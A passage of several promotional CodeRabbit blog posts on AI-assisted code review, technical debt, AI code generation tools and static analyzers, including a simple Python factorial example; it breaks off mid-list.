Done right, human reviewers stop verifying basic correctness and start focusing on design, edge cases, and the failure modes the tests don't cover. ### 4. Layer static analysis and linting Static analysis and [linting](https://coderabbit.ai/blog/why-developers-hate-linters) belong in the pipeline as automated guardrails, not human checklists. Run them pre-commit or in CI so structural issues, type mismatches, common security patterns, and style violations get flagged before any reviewer sees the diff. The mechanical layer should catch the mechanical problems. A reviewer who has to comment on missing null checks or unused imports is spending cognitive load that should go toward design and logic. Combine the tools rather than picking one: * A linter for style * A type checker for correctness * A static application security testing (SAST) scanner for security Each catches a different class of issue, and the overlap is small. ### 5. Standardize coding conventions Shared coding conventions remove the most predictable arguments from [code review](https://coderabbit.ai/blog/ai-code-reviews-boosting-dev-team-performance). Document the patterns your team agrees on: naming, file organization, error handling, testing structure, and what "done" actually means for a PR. Make as much of it machine-enforceable as you can. A formatter handles whitespace, while a PR template enforces the definition of done. The work of standardization happens once, and it pays out every time a reviewer doesn't have to explain a convention from scratch. When conventions live only in a senior engineer's head, drift is inevitable. But when they live in code and tooling, drift is hard. ![Freee logo with a bird icon and 'CodeRabbit CASE STUDY' text on a dark grid background.](https://victorious-bubble-f69a016683.media.strapiapp.com/free_7064ac3a6b.png) Together, these practices compound. 
[For example, freee](https://www.coderabbit.ai/case-studies/how-freee-saved-months-of-reviewer-time-coderabbit), a Tokyo-based business management SaaS company, saved the equivalent of 32.8 weeks of reviewer time over six months after pairing these practices with AI code review. The deployment expanded from a 30-seat pilot to 570 seats across 285 repositories. ## A practical code review checklist When the team agrees on what every reviewer should check, standards drift disappears. A useful checklist covers six things: * **Functionality:** Does the code do what it claims? Are edge cases handled? Are failure paths tested? * **Logic and correctness:** Conditional logic, error handling, null safety, and concurrency. These are the categories [CodeRabbit's State of AI vs Human report](https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report) flags most heavily in AI-generated code. * **Readability:** Variable names, structure, and comments where complexity warrants them. Skip the formatting wars. Let the formatter handle those. * **Security:** Credential handling, input validation, and common injection patterns. Catch these in review, not in a post-mortem. * **Tests:** Does the test cover the behavior, not just the implementation? Do the tests fail when the code is wrong? * **Documentation:** Public APIs, non-obvious decisions, and breaking changes need a note. That's the human reviewer's job. Style, formatting, and obvious linting violations should be caught earlier in the pipeline. ## Designing code review for async, distributed teams The cost of async review is round count. Each back-and-forth eats a day, so the teams that ship across time zones optimize to land the review in one or two passes, not to be faster, but to require fewer rounds. Four practices keep the round count low: * **Pre-annotate non-obvious code in the PR description:** Walk the reviewer through the changes before they see the diff. The first round of "what is this doing?" 
should be answered before they ask. * **Make every comment self-contained:** Include the actual question and the actual ask. "Thoughts?" forces a follow-up. "Can we extract this into a helper to avoid duplicating the validation logic?" gets answered in one round. * **Mark comments as blocking vs. non-blocking:** Authors need to know which comments must be addressed before merge and which are suggestions. Without that signal, every round becomes a clarification round. * **Set a primary reviewer:** Multiple reviewers in different time zones, each waiting on the others, means PRs rot. Name one primary; mark the rest optional. The teams that handle this well treat async review as a design problem, not a scheduling problem. ![Taskrabbit logo with 'CodeRabbit CASE STUDY' text on a dark, textured background.](https://victorious-bubble-f69a016683.media.strapiapp.com/taskrabbit_e717eccec8.png) [Taskrabbit](https://www.coderabbit.ai/case-studies/taskrabbit-cut-merge-time-by-25-before-adopting-coding-agents) fixed exactly this before adopting AI coding agents. With engineering split between San Francisco and Poland, PRs opened after 2 pm PST waited a full day for the first review. After deploying CodeRabbit, the average PR cycle time dropped from 10 days to 7, a 25% reduction. Senior Engineering Manager Kiran Kanagasekar described the logic plainly: "Writing code faster was never the issue; the bottleneck was always code review." ## Putting it all together: AI code review and the sustainable quality workflow AI code review works as a first-pass filter that preserves human reviewer capacity for the decisions that actually need it. The categories AI handles well are the ones that wear humans out: catching null checks the author forgot, flagging unused imports, surfacing common security patterns, and spotting style inconsistencies. 
The categories where humans still win are the ones that require domain context: design, architecture, and the question of whether this change makes sense for what the team is actually trying to build. The split is clean: * **AI handles volume:** Null checks, unused imports, style consistency, and common security patterns. * **Humans handle judgment:** Design, architecture, system-level decisions where domain context is irreplaceable. That split is what makes the workflow sustainable. When a human reviewer opens a PR and the mechanical issues have already been flagged, they get to spend their attention on the questions worth asking. [CodeRabbit](https://www.coderabbit.ai/), the AI code review platform, runs this first pass everywhere developers work: pull requests, [IDEs (VS Code, Cursor, Windsurf)](https://coderabbit.ai/blog/how-we-built-our-ai-code-review-tool-for-ides), CLI, and mobile [code review through Slack](https://www.coderabbit.ai/agent). Every PR gets a walkthrough summary and a run of 40+ bundled linters and SAST tools inline before a human sees it. The standards-enforcement angle matters just as much. Teams encode their conventions once into CodeRabbit Learnings, Code Guidelines, or path-based rules, and CodeRabbit applies them during pull request reviews. The rules live in the review process instead of a Notion page nobody reads. Sustainable code quality comes from treating reviewer attention as a finite resource and building systems that protect it. The work happens in layers: pre-commit checks before the PR opens, AI review handling the first pass, humans focused on design and architecture, CI/CD validating the merge. Each layer catches what the previous one missed, and the combination keeps the team shipping quality code without grinding through the people who write it. Ready to make code review sustainable for your team? [Get a 14-day free trial](https://app.coderabbit.ai/login?free-trial) of CodeRabbit today.

Reduce Tech Debt: AI's Role in Efficient Coding

Aravind Putrevu — Mon, 15 Apr 2024 00:00:00 GMT

Developers who work on a coding project sometimes just go for the quick fix, racking up technical debt. It’s like taking a shortcut now but ending up on a longer, bumpier road later. The code gets messy and hard to understand or change. Before you know it, you’re spending more time fixing code than building new features. AI code reviews can stop tech debt from ever entering the codebase. A developer might write a shortcut, but the AI is there to fill in the gaps and build out the code so there's no technical debt to fix later. These reviews help developers make smarter decisions from the get-go, keeping your code clean and maintainable. That’s why they’re a game-changer in the world of coding. ## The rise of AI in code review and generation Gone are the days when code review was solely a labor-intensive task performed by human eyes. Today, AI-driven tools are transforming this critical phase of software development. They’re elevating the efficiency, accuracy, and overall quality of coding projects. Here is what AI-driven code review and generation bring to the table: * **Sophisticated algorithms:** AI-driven tools, using advanced algorithms, quickly detect syntax errors and complex structural issues. This approach significantly reduces the time and effort that manual code review processes usually demand. * **Expert insight:** AI in code review offers insights and suggestions, enhancing code quality and ensuring consistency. It acts as an invaluable resource for developers seeking to refine and perfect their code. * **Continuous learning:** AI-driven code generation tools understand context, follow logical structures, and learn from previous codebases. Aside from automating parts of the coding process, they also improve upon existing coding practices. The adoption of AI in software development is fundamentally changing how we tackle coding tasks and manage projects. It’s a shift that enhances software development processes, leading to more efficient and innovative outcomes. 
You can see this transformation in several key areas: * **Reduced tech debt:** AI-driven tools help ensure higher-quality code, reducing future rework and associated costs. The result is a more sustainable and manageable development lifecycle. * **Boosted developer productivity:** AI handles mundane tasks, freeing developers for complex programming. As an added bonus, it enhances morale and allows for a more creative and innovative approach to problem-solving. * **Standardization and consistency:** AI tools promote consistent coding practices, easing maintenance and debugging. The greater consistency leads to a more reliable and cohesive codebase, simplifying collaborative efforts across teams. The above advantages also set the stage for more strategic development tactics. With AI reducing technical debt, development teams can redirect their focus towards more innovative coding approaches. Developers who make this shift are freed from the repetitive cycle of routine maintenance and minor updates. ## Understanding AI code reviewers AI code reviewers are bringing efficiency and precision to a task traditionally characterized as time-consuming. To understand how these AI systems work, let’s dive into their operational mechanics and the advantages they offer over traditional code review methods. During an AI-enabled code review, machine learning algorithms analyze code against a vast array of rules. They are trained on large datasets of existing code, which helps them learn and recognize patterns, best practices, and even coding styles. When a developer submits code for review, the AI scans through it, much like a human reviewer would, but with the added ability to process and analyze large volumes of data at an unparalleled speed. Developers use code reviewers to check for syntax errors, potential bugs, security vulnerabilities, and adherence to coding standards. 
Incorporating AI enables these reviewers to learn and adapt over time, enhancing their effectiveness and allowing them to become increasingly aligned with the specific coding practices of each project. This adaptability gives them several advantages over traditional review methods: * **Speed and efficiency:** AI code reviewers analyze vast amounts of code in a fraction of the time it would take a human, providing immediate feedback to developers. Their speed dramatically accelerates the development cycle. * **Consistency:** Unlike humans, AI is not subject to fatigue or variability in performance. It consistently applies the same standards to every code review, ensuring uniform quality and adherence to best practices across the board. * **Objectivity:** AI reviewers reduce the subjective nature of human code reviews. Their feedback is based purely on data and learned patterns, reducing the potential for bias or misunderstanding. * **Scalability:** As codebases grow and become more complex, AI-enabled tools become increasingly valuable. They’re able to handle the increased workload at scale, something that can be challenging and resource-intensive with traditional methods. * **Continuous improvement:** AI systems continually learn from new code and patterns, making them progressively more effective over time. They adapt to emerging coding standards and practices, keeping the review process up-to-date. * **Developer skill enhancement:** By providing consistent and immediate feedback, AI code reviewers serve as an educational tool for developers, helping them improve their coding skills and learn new best practices. AI-enabled code reviews bring a level of efficiency, precision, and consistency previously unattainable with human-only review processes. They’re fostering a culture of continuous learning and quality improvement in coding practices. The end result is a higher quality of software development. 
## Combating technical debt with AI Technical debt is an unavoidable reality. However, with the advent of AI tools, we now have a powerful ally to identify and mitigate an issue that has long plagued software development. Technical debt, much like financial debt, accumulates over time: shortcuts in coding, delayed refactoring, or opting for quick fixes can lead to a codebase that's expensive to maintain and challenging to update. This is where AI steps in, offering a suite of solutions that are as effective as they are innovative. ### Early identification and prevention of tech debt [AI-powered static code analysis](https://resources.coderabbit.ai/blog/static-code-analyzers-vs-ai-code-reviewers-which-is-best) tools are highly effective at scanning code to identify problem areas, such as complex code blocks, code smells, or deviations from best practices. By pinpointing these issues early, they prevent the accumulation of technical debt. Another aspect is the AI's ability to analyze historical data, learning from past coding patterns and their outcomes. This predictive analysis can alert teams to potential debt-ridden areas in a codebase, even before they become a significant problem. Tools like CodeRabbit [use this approach](https://docs.coderabbit.ai/about/features#chat-with-coderabbit), offering intelligent suggestions based on a vast database of code. ### AI-driven refactoring and solution suggestions AI is highly effective at identifying problems and offering solutions. Some AI tools suggest code refactoring or even automate parts of the refactoring process. This proactive approach saves hours of manual labor and reduces the risk of introducing new errors during the refactoring process. 
Moreover, AI is able to execute complex refactoring tasks with precision, adapting and refining the code to modern standards and practices. Dev teams keep their codebases lean, efficient, and future-proof, significantly reducing long-term technical debt. ## The future of coding using AI As AI-powered tools become more sophisticated and intertwined with development processes, we can expect a notable reduction in technical debt, leading to healthier, more manageable codebases. This shift will free up development teams to focus more on innovation and creative solutions, expanding the possibilities in software development. To delve deeper into how AI is transforming code reviews, "[AI and the Future of Code Reviews: A Deep Dive into CodeRabbit](https://docs.coderabbit.ai/blog/coderabbit-deep-dive?)" is an invaluable resource. If you’re interested in learning how to integrate these AI advancements into your development process and make technical debt a manageable aspect of your workflow, visit [CodeRabbit](https://coderabbit.ai/) for insightful strategies and solutions that are shaping the future of coding.

Maximizing Efficiency: Pairing Code Generators with AI Code Reviewers

Aravind Putrevu — Fri, 12 Apr 2024 00:00:00 GMT

Contrary to popular belief, the image of developers tirelessly coding day and night doesn't quite match reality. Most developers are focused on completing their projects as quickly as possible, not spending endless hours in front of an IDE. That means using whatever tools they can to maximize their efficiency. AI-driven code generators are part of the solution. Aside from speeding up the development process, they also make it more user-friendly and approachable for individuals across various skill levels. Still, there’s no guarantee that the code will be perfect. That's where AI code reviewers step in. They make sure quickly-churned code is also quality code. The pairing of these two AI tools together is reshaping how developers code. It’s enabling them to work smarter, not just faster. Using both AI code generation and AI code reviews strikes a balance between efficiency and excellence. ## The evolution of code generation technologies The history of code generation technologies follows a highly accelerated timeline. Initially, code generators were basic tools that automated repetitive coding tasks. Their primary aim was to save time and reduce the potential for human error. However, their capabilities were limited to what they were explicitly programmed to do. Fast forward to the present and you'll see a drastic transformation toward generative AI. Today's AI-powered code generators use sophisticated algorithms to learn from vast repositories of code what to generate. They’re able to predict and fulfill developer needs in real-time. We're talking about tools that understand context, anticipate requirements, and even suggest improvements – all while being seamlessly integrated into the developer's workflow. The brilliance of these current AI code generators lies in their ability to continuously learn and evolve. They draw on coding best practices and trends. The solutions they offer make junior-level code better and senior-level code faster. 
Within seconds, devs can stub out an API, assess the complexity of a for loop, and make sure the code actually fulfills the original [requirements.](https://docs.coderabbit.ai/guides/configure-coderabbit/)

### GitHub Copilot example

Let’s say a developer uses GitHub Copilot to write a Python function that calculates the factorial of a number. Let’s also say they’re using CodeRabbit for AI code reviews. Here’s how that might play out in this scenario:

1. **Starting the function:** The developer begins by typing a function definition in Python, like `def factorial(n):`. Upon entering this, GitHub Copilot might automatically suggest the rest of the function, recognizing the common pattern for calculating a factorial.
2. **Suggested code by GitHub Copilot:**

   ```python
   def factorial(n):
       if n == 0:
           return 1
       else:
           return n * factorial(n-1)
   ```

3. **Use the function:** The developer can then use this function in their code to calculate factorials. For example, to calculate the factorial of 5, they would simply call `factorial(5)`.
4. **AI code review:** As part of its review capabilities, CodeRabbit might suggest improvements or identify issues. For example, if the original function didn’t handle negative inputs, CodeRabbit could recommend adding a check for this:

   ```python
   def factorial(n):
       if n < 0:
           raise ValueError("Factorial is not defined for negative numbers")
       if n == 0:
           return 1
       else:
           return n * factorial(n-1)
   ```

5. **Facilitates workflow:** CodeRabbit works alongside your existing development workflow, within the code hosting platform you use, such as GitHub or GitLab. It analyzes code within pull requests, providing feedback directly on the pull request itself. You can even chat with CodeRabbit for real-time code discussion and clarification.

In this example, GitHub Copilot assists in writing the initial code and CodeRabbit reviews and refines it. The revision makes the function more robust by handling edge cases like negative inputs.
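To make the edge case in this walkthrough concrete, here is a minimal sketch that exercises the reviewed version of `factorial`. The helper `rejects_negative` is a hypothetical name introduced only for this illustration; it is not part of Copilot's or CodeRabbit's output.

```python
def factorial(n):
    """Reviewed version from the walkthrough: rejects negative input."""
    if n < 0:
        raise ValueError("Factorial is not defined for negative numbers")
    if n == 0:
        return 1
    return n * factorial(n - 1)


def rejects_negative(value):
    """Hypothetical helper: True if factorial(value) raises ValueError."""
    try:
        factorial(value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(factorial(0))          # 1
    print(factorial(5))          # 120
    print(rejects_negative(-3))  # True
```

Without the negative-input check, a call such as `factorial(-3)` would never reach the base case and would keep recursing until Python raised a `RecursionError`, which is why this kind of review comment is worth acting on.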
## Benefits of AI code reviewers AI code reviewers are eagle-eyed code editors. They scan your code and leverage advanced algorithms to detect issues that might slip past the human eye. They’re constantly on the lookout for errors, inconsistencies, or even potential improvements. But they don’t just spot mistakes; they also make sure your code sticks to best practices and predefined coding standards. Developers that integrate AI code reviewers into their development process will gain a host of benefits that enhance their coding efficiency. Here are a few key advantages: * **Precision and thoroughness:** AI code reviewers bring precision and thoroughness to the table, qualities that often surpass human reviewers. They deliver unwavering accuracy, which is essential in projects where even the smallest errors can lead to significant consequences. This level of meticulousness and reliability in code review is invaluable in maintaining high standards of quality and efficiency. * **Consistent and objective:** AI is always steady and unbiased – it doesn’t have those off days or get upset about decisions from above. It approaches coding without any personal preferences, sticking solely to what it’s been trained on. Additionally, AI reviews every line of code uniformly, ensuring the same level of attention throughout. This consistent scrutiny is something really challenging to achieve when only humans are involved in the review process. * **Automating tedious tasks:** Code reviews can get a bit tedious with all the repetitive stuff like making sure the coding standards, documentation, and boilerplate code are on point. That's where AI steps in, handling these parts of the review automatically. This frees up the human reviewers to tackle the trickier, more nuanced parts of the code that really need a human touch. The result is a review process that moves along faster and it's less of a mental marathon for the human reviewers. 
* **Instantaneous feedback:** A big plus of using AI in code reviews is how it can analyze code and give feedback right away. This means developers get pointers in the thick of the code review discussion, not way later in the development cycle. Catching issues early on like this can really cut down on the hassle and expense of fixing bugs later. It’s all about nipping problems in the bud when they’re smaller and easier to handle. * **Learning and adaptation:** Advanced AI systems have the knack for learning from past reviews, the tweaks developers make, and the ever-changing world of coding practices. Thanks to this ability to learn and adapt, AI assistants get better and better over time, providing feedback that becomes increasingly relevant and on-point. * **Identify defects faster:** AI has the capability to swiftly sift through thousands of lines of code, pinpointing logical issues and complex security vulnerabilities with a precision that often matches or even exceeds what humans can spot. This efficiency lets human reviewers concentrate on more abstract aspects like architecture and design, rather than spending their time hunting for those hard-to-find errors. The integration of AI code reviewers into software development workflows will propel coding spaces to be more dependable, efficient, and team-friendly. They're spotting mistakes and building a world where quality, consistency, and sticking to standards are at the heart of every project. The idea of AI code generators and reviewers working together is like pairing a skilled artist with a meticulous art director. Each plays a distinct role, yet when combined, they enhance the entire creative process. By integrating code generation with AI review processes, you’re combining the innovative capacity to create code swiftly with the critical eye to refine and perfect it. 
For complex projects with multiple coding languages, an AI code generator could quickly create functional segments in various languages, while the AI reviewer could ensure that the code segment aligns with the project's standards and overall architecture. This collaboration saves time and significantly reduces the mental effort of the developer, allowing them to focus on the more arcane aspects of the project. ## Addressing the challenges of AI implementation in development Implementing AI in software development comes with its unique set of hurdles, but understanding these challenges and employing the right strategies can make integration smoother. Here's a breakdown: * **Compatibility issues:** Introducing AI into an established system might clash with legacy systems. It's like fitting new pieces into an old puzzle – some adjustments are needed. * **The learning curve:** Adopting AI tools requires your team to climb a steep learning curve. Ensuring everyone is up to speed is crucial for successful integration. * **Risk of over-reliance on AI**: Balancing AI tools with human expertise is essential. Too much dependence on AI can upset the balance between automated processes and human judgment. Having highlighted the key challenges of implementing AI in software development, let's shift our focus to navigating these obstacles. For strategies to weave these advanced tools into your existing systems effectively, consider the following: * **Start small:** Begin with less complex projects to allow your team to acclimate to the new tools without feeling overwhelmed. * **Choose the right fit:** Opt for AI tools that complement and integrate well with your current tech stack and workflows. * **Ongoing education and training:** Regular workshops and hands-on projects can keep your team adept at using AI tools effectively. * **Maintain a feedback loop:** Listen to your team's experiences and suggestions to guide further adjustments and enhance the integration process. 
Weaving AI into your software development process demands patience, strategic planning, and adaptability. When done effectively, it can lead to improvements in efficiency, innovation, and competitive advantage. ## Best practices for using AI in code development If you’re looking to implement AI into your code development, you’ll have to adapt your approach. Here are some tips for developers and teams to effectively harness the power of AI tools: * **Understand each tool’s capabilities:** Get to know the strengths and limitations of your AI tools. Understanding what they can and can’t do helps in setting realistic expectations and using them to their full potential. * **Enhance human skill, don’t replace it:** Use AI as an enhancement to your skills, not a replacement. It should aid your coding process without controlling it. * **Maintain quality standards:** AI can speed up coding, but don’t let it compromise the quality. Always ensure that the output meets your project's standards. * **Monitor and adjust processes**: Regularly assess how AI tools are impacting your workflows. Be open to tweaking processes for better efficiency. * **Prioritize data privacy and security:** As AI tools often process sensitive data, always prioritize data security and privacy in your coding practices. * **Plan for continuous integration:** Adopt an approach that allows for continuous integration of AI tools into your development process. It’s about staying adaptable and being ready to incorporate new AI capabilities as they emerge, ensuring your development process remains dynamic and future-proof. By following these best practices, developers and teams can optimize the use of AI in their code development, ensuring they stay ahead in the rapidly evolving world of technology. It's about balancing innovation with practicality and security, all while pushing the boundaries of what's possible in code development. CodeRabbit is at the forefront of redefining code review and analysis. 
Our sophisticated AI code review tools are expertly designed to synergize with leading code generators in the market. We refine and thoroughly analyze existing code, thereby guaranteeing superior quality and maximizing efficiency. CodeRabbit is not just adapting to current trends but is actively pioneering them. We invite you to join us in this innovative journey and discover how [CodeRabbit](https://coderabbit.ai/) can revolutionize your development workflow.

Top 5 AI Code Generation Tools

Aravind Putrevu — Thu, 11 Apr 2024 00:00:00 GMT

AI has significantly eased the coding process for professionals, streamlining complex tasks and enhancing efficiency. Experienced developers can leverage AI to quickly generate code, boosting productivity and leaving more time for intricate problem-solving and innovation. Seasoned professionals can stub out APIs in seconds. Beginners have a partner available 24/7 for code reviews and assessments. Even non-developers can release entire applications as long as they can sufficiently describe what they want in a prompt.

There are several AI code generation tools on the market and new ones are appearing every day, each with unique features and capabilities. Let’s take a look at some of the best and most popular options.

![](https://framerusercontent.com/images/7ocezK3cnrQMYgBU3WNT8qAXg.png)

## 1\. Copilot by GitHub

Developed in collaboration with OpenAI, [Copilot by GitHub](https://github.com/features/copilot) is a transformative code generator leveraging advanced language models like OpenAI's GPT-3 and Codex. It serves as more than just a coding assistant; it’s a virtual partner in programming. Here are its standout features:

* **Seamless integration with popular IDEs:** Copilot sets itself apart with its integration into widely used editors and IDEs such as the JetBrains IDEs, Neovim, Visual Studio, and Visual Studio Code. This integration facilitates a smooth coding experience, aiding in writing code, understanding complex codebases, and debugging.
* **Predictive code generation:** At the heart of Copilot's functionality is its predictive code generation, which suggests whole lines or blocks of code. This feature greatly accelerates the development process. Because Copilot was trained on a variety of public code repositories, it supports numerous programming languages effectively.
* **Adaptive learning and security detection:** GitHub’s Copilot doesn’t just follow a set pattern; it learns and adapts to individual coding styles, making its recommendations more personalized and accurate. It also includes the ability to detect security vulnerabilities, adding an extra layer of utility and safety to its coding assistance. Copilot is available in three subscription tiers, ranging from $10 for individuals to $39 for enterprises. It also offers complimentary access for students, teachers, and open-source project maintainers, making it accessible to a wide range of users. ## 2\. Replit GhostWriter [Replit GhostWriter](https://replit.com/ai) is an innovative tool designed to help programmers craft efficient, high-quality code. Here are its top three features that really make it stand out: * **Real-Time Coding Capabilities:** GhostWriter shines with its ability to autocomplete boilerplate code in real time as you type. This feature streamlines the coding process, making it faster and more efficient. * **Seamless Integration with Replit Online Code Editor:** The tool is flawlessly integrated into the Replit online code editor. This allows coders to write, execute, debug, and collaborate on code within a single, browser-based environment, greatly enhancing the overall coding workflow. * **Support for Over 16 Programming Languages:** GhostWriter is versatile, supporting a wide range of programming languages, including Python, JavaScript, Ruby, and more. This versatility is coupled with the ability to provide code explanations and comments, aiding developers in understanding and improving their code. Available in both Replit's Free and Core tiers, GhostWriter caters to various coding needs with both limited and advanced model options. ## 3\. Amazon CodeWhisperer Amazon’s [CodeWhisperer](https://aws.amazon.com/codewhisperer/) is a machine learning-powered service designed to assist developers in improving their productivity. 
By analyzing comments written in natural language and the existing code within an integrated development environment (IDE), CodeWhisperer offers relevant code recommendations. The key features that set it apart include: * **Open-source:** References suggestions from open-source data, granting easy access to relevant project repositories and licenses. * **Real-time interaction:** Offers real-time coding suggestions, from concise snippets to complete functions, leveraging insights from billions of lines of code. * **Enhances security:** Excels in identifying potential security vulnerabilities by using built-in security scans (detecting issues like exposed credentials and log injection). It provides instant solutions to these issues and aligns with top-tier security practices. For those seeking a more personalized coding experience, CodeWhisperer is adaptable to your unique requirements. It aligns with your internal libraries, APIs, and established best practices for more relevant code suggestions. Besides improving code quality, CodeWhisperer also speeds up the onboarding process of new developers by providing suggestions and resources that match your organization's standards. CodeWhisperer offers a free Individual tier, which includes comprehensive features like code suggestions, reference tracking, security scans, and conversational coding with AWS’ AI-powered assistant Amazon Q. For professional use, it’s available at $19 per month. ## 4\. Cody by Sourcegraph Powered by Claude 2, [Cody by Sourcegraph](https://sourcegraph.com/cody) offers a comprehensive suite of features to enhance the coding experience. What sets Cody apart is its deep integration with the codebase it works with, providing intelligent, context-aware suggestions that go beyond mere code completion. It's all open source. Cody uses a blend of Large Language Models (LLMs), Sourcegraph search capabilities, and extensive code expertise to achieve a seamless coding experience. 
Notable features of Cody by Sourcegraph include:

* **Intelligent code completion:** Cody's AI predicts and offers relevant code snippets as you type, streamlining the coding process and boosting efficiency.
* **Automated code reviews and bug fixing:** Cody excels at identifying potential bugs and suggesting fixes, greatly reducing debugging time and improving overall code quality.
* **Universal compatibility:** Cody is designed to operate across all programming languages, making it a versatile tool for global business needs.
* **Enhanced security:** With strong AWS encryption and adherence to SOC 2 database privacy standards, Cody ensures your data remains protected.

Cody stands out for its ability to offer real-time code reviews, automated bug detection, and solutions, all while functioning seamlessly within your existing tech stack. Its chatbot feature, with full knowledge of your entire codebase, provides tailored code writing and refactoring based on natural language instructions. Cody can also generate unit tests and documentation with a deep understanding of the entire codebase.

Cody also offers an extension for VS Code, serving as an efficient coding assistant integrated into the IDE. For personal projects, individual developers can access Cody without charge. With Sourcegraph, Cody starts at $5k/year.

## 5\. Cursor

[Cursor](https://cursor.sh/) stands out for its integration of AI directly into the code editing process, facilitating a unique pair-programming experience with AI. It doesn’t just generate code; it changes how developers interact with their projects and boosts their productivity. The AI-powered code editor also enhances the development workflow with a range of innovative features.
Prominent features of Cursor:

* **AI-generated code and editing:** Offers advanced code generation capabilities, helping you code faster and with fewer errors.
* **AI assistance in terminal and lint fixes:** Streamlines your workflow with AI-powered debugging and automatic lint fixing.
* **Codebase-aware chatbot:** Provides helpful, context-aware interactions, offering insights and tailored answers directly related to your repository.
* **Simple migration and privacy options:** Easy migration from VS Code with a one-click setup and options for private code to maintain confidentiality.
* **Free plan available:** Accessible with a complimentary plan that includes the AI-powered code editor and private data controls.

Cursor is not just another code editor; it’s a comprehensive AI assistant that understands your codebase and interacts intelligently with your projects. It streamlines and simplifies the coding process, whether it’s generating code from simple prompts, assisting in debugging, or providing direct references and documentation within the editor. Cursor integrates with existing workflows, with emphasis on privacy and ease of use. Developers can subscribe to one of three tiers: Free, Pro ($20/month), or Business ($40/seat/month).

## The impact of AI is just beginning

We've just scratched the surface with a few standout examples, but there's a lot more. AI code generators are just the beginning. There are countless other AI tools out there transforming how we code. As technology advances, we’re likely to see even smarter AI tools emerging. Their sudden popularity is changing how coding is done, making it a more streamlined, less error-prone process and opening doors for everyone, from coding wizards to beginners.

CodeRabbit is revolutionizing code review and analysis with our advanced AI code review tools. Tailored to complement the top tools in the market, we focus on enhancing and scrutinizing existing code, ensuring quality and efficiency.
With our AI-first approach, we're not just following trends; we're setting them. Join us as we push the limits of AI in coding, and see how [CodeRabbit](https://coderabbit.ai/) can transform your development process.

Static code analyzers vs AI code reviewers: Which is Best?

Aravind Putrevu — Sat, 06 Apr 2024 00:00:00 GMT

Two of the most important tools modern developers rely on to improve their code are static code analyzers (SCAs) and [AI code reviewers.](https://www.coderabbit.ai/blog/how-coderabbits-agentic-code-validation-helps-with-code-reviews)

Imagine you’re an author. A static code analyzer is like a trusted grammar book on your shelf, always ready to point out syntactical errors or discrepancies with well-established rules. It’s methodical, precise, and operates within the rules and best practices you and your team set for it.

The AI code reviewer is more like a seasoned editor who understands the rules of grammar but also gets your unique style and the context of your work. As an AI-powered assistant, it can offer suggestions that improve overall readability, structure, and even the logical flow of your narrative.

Beginning developers may wonder which is the best ally for their coding endeavors, but today’s leading developers benefit from a harmonious collaboration between the two.

## Understanding static code analyzers

SCAs perform thorough checks on your code. They analyze the source code's static elements, such as structure, syntax, and other components. They don't execute the code but examine it to ensure it's well-organized and adheres to set standards. Here is how the key features of these analyzers contribute to making your code more robust and reliable:

* **Rule-based analysis:** Code analyzers operate based on predefined rules, focusing on finding syntax errors, potential bugs, and stylistic issues. It's like aligning your code with a best practices guide.
* **Consistency enforcement:** They ensure coding standards are consistently followed across the project, promoting readability and maintainability.
* **Early bug detection:** By identifying issues early in the development process, they save time and resources in later stages.
* **Security flaw identification:** Some analyzers are equipped to detect security vulnerabilities, safeguarding your code against potential threats. SCAs, with their thorough scrutiny and rule-based approach, serve as the first line of defense in code quality assurance. They highlight potential issues before the code goes live, acting as an essential preventative measure in the development process. Popular analysis tools include: SonarQube, Checkmarx, ESLint, Fortify SCA, and Coverity. They each specialize in different languages, offer different types of integrations, and focus on various aspects of software, such as the OWASP Top 10 or code smells. ### Common use cases SCAs are highly favored in environments where developers must carefully maintain code quality and follow coding standards. They're commonly used in large-scale projects and industries where software reliability is non-negotiable, like aerospace, automotive, and financial sectors. Additionally, SCAs are indispensable in industries where regulatory compliance is mandatory, as they help ensure that software adheres to stringent legal and safety standards. Developers find that SCAs enhance continuous integration and continuous deployment (CI/CD) pipelines, ensuring code quality is maintained and preventing new bugs during rapid development cycles. Additionally, they are invaluable in educational settings, assisting new programmers in learning and adhering to coding best practices from the outset. SCAs guard your code so it’s up to the mark, secure, and in good order. While they might not fully grasp the overarching goals of your project, they excel in precise adherence to coding standards, focusing intently on the minutiae of your code. ## SCA example SonarQube is probably the most popular SCA in the software industry. Its primary strength lies in its rule-based analysis, which efficiently spots syntactic errors and standard violations. 
Unlike [AI code reviewers](https://docs.coderabbit.ai/blog/ai-code-reviews-reclaims/) that provide context-aware feedback, SonarQube strictly adheres to predefined rules, making it highly effective for ensuring code meets specific coding standards and guidelines. The difference in approach underscores the fundamental operational distinction between SCAs and AI-driven code reviewers. ![](https://framerusercontent.com/images/uy5yxoDUmRkhveLVsCkW9sMVnHc.png) SonarQube excels with its wide-ranging integration with various IDEs and CI/CD pipelines, making it a versatile choice for teams aiming to maintain code quality. It goes beyond identifying errors, offering deep insights into your codebase’s health, and provides clear guidance for enhancing code efficiency and strength. ## Exploring AI code reviewers The world of code review is getting a major upgrade thanks to AI. AI code reviewers are more than just tools; they're changing how developers approach and improve coding. Unlike their static counterparts, these dynamic tools understand the context within which code is written, making their insights incredibly valuable for developers. Developers that employ AI code reviewers enjoy three important advantages over traditional code analysis: * **Adaptation:** Every piece of code they analyze makes them more efficient at spotting errors, suggesting fixes, and even predicting future issues. Their learning ability is a huge plus, especially in fast-paced development where quick and continual improvements are key. * **Speed:** AI code reviewers offer feedback in real-time, which means developers can tweak and improve their code on the fly. Instant feedback is a big deal in modern development practices, where things move quickly and updates are constant. * **Versatility:** Developers often work with several languages. AI code reviewers are able to handle several, making them a perfect fit for diverse development teams. 
Plus, they slide right into existing workflows, improving efficiency without turning everything upside down. AI code reviewers' ability to continuously learn and adapt enables developers to identify evolving coding trends and best practices. As a result, they’re shaping the future of programming languages and techniques. Ultimately, developers recognize AI reviewers as key catalysts for the next evolution in software development, a significant shift that promises to reshape the industry's future. ## AI code reviewer example: CodeRabbit [CodeRabbit](https://coderabbit.ai/) stands out as an innovative AI-driven code review tool designed to enhance development speed and code quality. The company claims its innovation emerged from their dissatisfaction with traditional code review methods. Here's what makes CodeRabbit unique: * **Line-by-line code change suggestions:** It scrutinizes each line of code changes, offering actionable suggestions that developers can directly commit via the GitHub interface. * **Continuous, incremental reviews:** Unlike traditional methods that review the entire pull request at once, our tool continuously evaluates each new commit. * **Cost-effectiveness with reduced noise:** The tool's focus on incremental reviews minimizes distractions by tracking only the changes made since the last commit, relative to the base of the pull request. * **Interactive chat feature:** Users can converse with the AI about specific lines of code or entire files, facilitating contextual understanding, test case generation, and complexity reduction. * 